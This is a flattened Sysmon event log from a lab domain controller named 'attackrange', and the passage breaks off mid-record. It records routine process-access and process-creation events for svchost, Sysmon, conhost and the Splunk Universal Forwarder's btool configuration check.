15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004992Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004991Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004990Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004989Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004988Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004987Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-0101-000000008801}2400C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004986Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004985Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7CD9-5FA1-0001-000000008801}7961328C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CD9-5FA1-0101-000000008801}2400C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004984Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.896{D28789B6-7CD9-5FA1-0101-000000008801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CD9-5FA1-0001-000000008801}796C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 10341000x80000000000000004983Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-0001-000000008801}796C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004981Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004980Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004979Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004978Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004977Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004976Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004975Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004974Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004973Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-0001-000000008801}796C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004972Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7CD9-5FA1-FF00-000000008801}2580800C:\Windows\system32\cmd.exe{D28789B6-7CD9-5FA1-0001-000000008801}796C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004971Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.891{D28789B6-7CD9-5FA1-0001-000000008801}796C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CD9-5FA1-FF00-000000008801}2580C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 10341000x80000000000000004970Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-FF00-000000008801}2580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004969Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004968Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004966Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W